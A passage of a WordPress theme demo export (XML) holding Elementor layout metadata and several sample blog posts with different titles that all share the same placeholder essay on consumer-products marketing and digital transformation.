be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"b91e1d6","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"0af249f","elType":"widget","settings":{"tshow_mobile":"1","dots_spacing_mobile":{"unit":"px","size":-60,"sizes":[]}},"elements":[],"widgetType":"ipcarousel"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:6:"column";a:3:{s:5:"count";i:4;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:4;s:19:"_inline_size_tablet";i:3;}}}}s:8:"iheading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:1;s:5:"title";i:1;s:11:"header_size";i:1;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:7:{s:9:"stitle_bg";i:1;s:27:"title_typography_typography";i:1;s:33:"title_typography_font_size_mobile";i:1;s:28:"stitle_typography_typography";i:1;s:27:"stitle_typography_font_size";i:1;s:12:"stitle_color";i:1;s:29:"stitle_typography_font_weight";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:5:"align";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:1;}s:14:"section_layout";a:1:{s:6:"layout";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:2;s:14:"padding_mobile";i:1;}}}}s:10:"ipcarousel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:12:"tshow_mobile";i:1;}}s:5:"style";a:1:{s:18:"navigation_section";a:1:{s:19:"dots_spacing_mobile";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Entering the Next Phase of Digital Transformation</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/entering-the-next-phase-of-digital-transformation/</link>
		<pubDate>Mon, 18 Dec 2017 04:13:14 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=413</guid>
		<description></description>
		<content:encoded><![CDATA[<p><span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #4b83fc">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.</p>
<p><span style="color: #1b1d21;font-weight: 600">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em></p>
<p><img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" /></p>
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21;font-weight: 600">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.</p>
<blockquote>
<p style="text-align: center;line-height: 36px">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”<br /><cite>DAVID OSWALD</cite></p>
</blockquote>
<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.</p>
<p><em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em></p>

<!-- wp:paragraph -->
<p></p>
<!-- /wp:paragraph -->]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>413</wp:post_id>
		<wp:post_date><![CDATA[2017-12-18 04:13:14]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2017-12-18 04:13:14]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[entering-the-next-phase-of-digital-transformation]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="post_format" nicename="post-format-audio"><![CDATA[Audio]]></category>
		<category domain="category" nicename="business"><![CDATA[business]]></category>
		<category domain="post_tag" nicename="consulting"><![CDATA[consulting]]></category>
		<category domain="post_tag" nicename="trading"><![CDATA[trading]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_audio]]></wp:meta_key>
		<wp:meta_value><![CDATA[https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/139083759]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_link]]></wp:meta_key>
		<wp:meta_value><![CDATA[The Future of Marketing in Consumer Products]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_link]]></wp:meta_key>
		<wp:meta_value><![CDATA[#]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[digital-transformation-roadmap-enablers]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[entering-the-next-phase-of-digital-transformation-2]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>In Media, Trimming Costs Boosts Value Transform</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/in-media-trimming-costs-boosts-value-transform/</link>
		<pubDate>Tue, 09 Jan 2018 08:49:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=423</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #4b83fc">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21;font-weight: 600">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" />
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21;font-weight: 600">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center;line-height: 36px">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>423</wp:post_id>
		<wp:post_date><![CDATA[2018-01-09 08:49:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2018-01-09 08:49:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[in-media-trimming-costs-boosts-value-transform]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="post_tag" nicename="business"><![CDATA[business]]></category>
		<category domain="category" nicename="consulting"><![CDATA[consulting]]></category>
		<category domain="category" nicename="finance"><![CDATA[finance]]></category>
		<category domain="post_format" nicename="post-format-link"><![CDATA[Link]]></category>
		<category domain="post_tag" nicename="tips"><![CDATA[tips]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_link]]></wp:meta_key>
		<wp:meta_value><![CDATA[#]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_link]]></wp:meta_key>
		<wp:meta_value><![CDATA[The Future of Marketing in Consumer Products]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[the-future-of-retail-asias-ecosystems]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[in-media-trimming-costs-boosts-value-transform-2]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>The Future of Retail: Asia’s Ecosystems</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/the-future-of-retail-asias-ecosystems/</link>
		<pubDate>Mon, 24 Feb 2020 09:00:43 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=430</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #55bb53">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21;font-weight: 600">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" />
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21;font-weight: 600">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center;line-height: 36px">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>430</wp:post_id>
		<wp:post_date><![CDATA[2020-02-24 09:00:43]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-02-24 09:00:43]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[the-future-of-retail-asias-ecosystems]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="post_tag" nicename="analysis"><![CDATA[analysis]]></category>
		<category domain="category" nicename="business"><![CDATA[business]]></category>
		<category domain="post_tag" nicename="business"><![CDATA[business]]></category>
		<category domain="category" nicename="marketing"><![CDATA[marketing]]></category>
		<category domain="post_format" nicename="post-format-video"><![CDATA[Video]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_video]]></wp:meta_key>
		<wp:meta_value><![CDATA[https://vimeo.com/87959439]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[in-media-trimming-costs-boosts-value-transform]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[438]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_pingme]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_encloseme]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[bg_video]]></wp:meta_key>
		<wp:meta_value><![CDATA[432]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Digital Transformation Roadmap: Enablers</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/digital-transformation-roadmap-enablers/</link>
		<pubDate>Wed, 14 Aug 2019 09:02:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=434</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #4b83fc">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21;font-weight: 600">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" />
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21;font-weight: 600">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center;line-height: 36px">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>434</wp:post_id>
		<wp:post_date><![CDATA[2019-08-14 09:02:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2019-08-14 09:02:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[digital-transformation-roadmap-enablers]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="post_tag" nicename="finance"><![CDATA[finance]]></category>
		<category domain="category" nicename="marketing"><![CDATA[marketing]]></category>
		<category domain="post_format" nicename="post-format-quote"><![CDATA[Quote]]></category>
		<category domain="post_tag" nicename="tips"><![CDATA[tips]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_quote]]></wp:meta_key>
		<wp:meta_value><![CDATA[I cannot give you the formula for success, but I can give you the 
formula for failure. It is: Try to please everybody.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[quote_name]]></wp:meta_key>
		<wp:meta_value><![CDATA[David Oswald]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[439]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[entering-the-next-phase-of-digital-transformation]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>How to Write a Successful Grant Application</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/how-to-write-a-successful-grant-application/</link>
		<pubDate>Thu, 08 Nov 2018 09:04:46 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=436</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #4b83fc">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21;font-weight: 600">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" />
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21;font-weight: 600">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center;line-height: 36px">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>436</wp:post_id>
		<wp:post_date><![CDATA[2018-11-08 09:04:46]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2018-11-08 09:04:46]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[how-to-write-a-successful-grant-application]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="post_tag" nicename="consulting"><![CDATA[consulting]]></category>
		<category domain="category" nicename="finance"><![CDATA[finance]]></category>
		<category domain="post_format" nicename="post-format-gallery"><![CDATA[Gallery]]></category>
		<category domain="post_tag" nicename="strategy"><![CDATA[strategy]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2018-11-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_gallery]]></wp:meta_key>
		<wp:meta_value><![CDATA[438]]></wp:meta_value>
